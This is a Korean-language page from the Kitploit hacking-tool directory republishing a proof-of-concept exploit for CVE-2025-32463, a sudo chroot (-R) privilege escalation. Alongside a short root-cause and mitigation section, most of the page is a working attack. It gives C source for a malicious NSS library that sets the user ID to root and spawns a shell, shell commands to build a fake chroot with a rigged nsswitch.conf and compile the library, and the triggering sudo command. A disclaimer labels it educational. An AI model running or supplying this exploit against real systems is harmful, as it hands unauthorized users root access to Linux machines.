Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/k3ystr0k3r/cve-2025-32463-exploit
Privilege EscalationVulnerability AnalysisExploitationShellcodePenetration TestingLearning & EducationPayload DevelopmentBinary Exploitation
GitHubk3ystr0k3r/cve-2025-32463-exploit

CVE-2025-32463-EXPLOIT

CVE-2025-32463 - Sudo 권한 상승에 대한 PoC 익스플로잇

저장소 보기
9241년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-32463 - Sudo 권한 상승

sudo에 Linux/Unix 기반 시스템에 영향을 주는 권한 상승 취약점이 존재합니다. 이 결함은 sudo가 -R(--chroot) 옵션과 함께 사용될 때 잘못된 경로 검증으로 인해 발생하며, 공격자가 악성 NSS 라이브러리 로딩을 통해 root로 권한을 상승시킬 수 있습니다.

근본 원인

  • sudo가 chroot 환경(-R 옵션) 내에서 명령을 실행할 때, 오류 조건에서 NSS(Name Service Switch) 라이브러리 로딩을 잘못 처리합니다.
  • 잘못된 경로 검증(예: LD_LIBRARY_PATH 또는 /etc/nsswitch.conf의 경로를 정화하지 못함)으로 인해 합법적인 NSS 라이브러리(예: libnss_files.so) 대신 악성 라이브러리가 로드될 수 있습니다.
  • 이로 인해 root 권한으로 임의 코드 실행이 발생합니다.

영향

  • 로컬 접근 권한이 있는 공격자는 이를 악용하여 root 권한을 획득할 수 있습니다.

완화 방안

  1. sudo를 최신 패치 버전으로 업데이트하세요.
  2. sudo 권한을 제한하세요(가능한 경우 chroot 사용을 제한).
  3. 환경 변수를 감사하세요:
    • LD_LIBRARY_PATH를 제한하세요.
    • /etc/nsswitch.conf를 안전하게 보호하세요.
  4. /etc/sudoers에서 secure_path를 적용하여 라이브러리 검색 경로를 제한하세요.

기술적 세부 사항

구성 요소취약점 트리거
sudo -R잘못된 chroot 경로 검증.
NSS오류 중 안전하지 않은 라이브러리 로딩.
익스플로잇경로 하이재킹 → 악성 라이브러리 로드.

취약점 개요

CVE ID: CVE-2025-32463
영향받는 버전: Sudo 1.9.14 ~ 1.9.17
CVSS 점수: 9.8 (치명적)
영향: 로컬 권한 상승으로 root 획득

공격 흐름

  1. 공격자가 악성 NSS 라이브러리를 생성합니다
  2. 가짜 chroot 환경을 설정합니다
  3. sudo 오류 조건을 트리거합니다
  4. sudo가 공격자가 제어하는 라이브러리를 로드합니다
  5. 악성 코드가 root 권한으로 실행됩니다

익스플로잇 단계

1단계: 취약점 확인

No such file or directory라고 응답하면 취약한 것입니다: sudo -R invalid invalid sudo: invalid: No such file or directory

2단계: 임시 작업 공간 생성

먼저 작업할 임시 디렉터리를 생성합니다: TMP_DIR=$(mktemp -d -t sudobridge.XXXXXX) cd $TMP_DIR 이 명령은 고유한 이름의 임시 디렉터리를 생성하고 그 안으로 이동합니다. mktemp 명령은 기존 시스템 파일을 방해하지 않도록 보장합니다.

3단계: 악성 라이브러리 생성

악성 라이브러리로 컴파일될 C 파일(bridge90.c)을 생성해야 합니다:

root@kitploit:~
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void bridge(void) {
  setreuid(0,0);  // Set real and effective user ID to root
  setregid(0,0);  // Set real and effective group ID to root
  chdir("/");     // Change to root directory
  execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);  // Execute shell
}

주요 구성 요소:

root@kitploit:~
__attribute__((constructor))는 라이브러리가 로드될 때 함수가 실행되도록 보장합니다

setreuid와 setregid는 권한을 root로 상승시킵니다

execl은 bash 셸을 생성합니다

4단계: 익스플로잇 환경 설정

mkdir -p bridge/etc echo "passwd: /bridge90" > bridge/etc/nsswitch.conf cp /etc/group bridge/etc/ mkdir libnss_ gcc -shared -fPIC -Wl,-init,bridge -o libnss_/bridge90.so.2 bridge90.c 세부 설명:

root@kitploit:~
bridge/etc에 가짜 chroot 환경을 생성합니다

nsswitch.conf를 수정하여 악성 경로를 가리키도록 합니다

실제 /etc/group 파일을 복사하여 정상적인 것처럼 유지합니다

악성 라이브러리를 위한 디렉터리를 생성합니다

C 코드를 NSS(Name Service Switch) 규칙에 맞는 이름의 공유 라이브러리로 컴파일합니다

5단계: 익스플로잇 실행

sudo -R bridge bridge

이 명령은 우리가 만든 환경을 사용하려고 시도합니다:

root@kitploit:~
첫 번째 bridge는 악성 구성을 포함하는 chroot 디렉터리입니다

두 번째 bridge는 실행할 명령입니다(우리 라이브러리를 로드할 것입니다)

6단계: 권한 상승 확인

성공적인 익스플로잇 후 root 접근 권한을 확인하세요:

whoami # "root"를 반환해야 합니다 id -u # "0"을 반환해야 합니다 (root의 UID)

root@kitploit:~
graph LR
    A[Malicious Library] --> B[Fake Chroot]
    B --> C[Trigger Error]
    C --> D[Library Load]
    D --> E[Root Execution]

면책 조항

이 PoC 익스플로잇은 교육 목적으로만 제공됩니다! 이 익스플로잇으로 인해 발생할 수 있는 모든 오용에 대해 저는 책임지지 않습니다!

도구 다운로드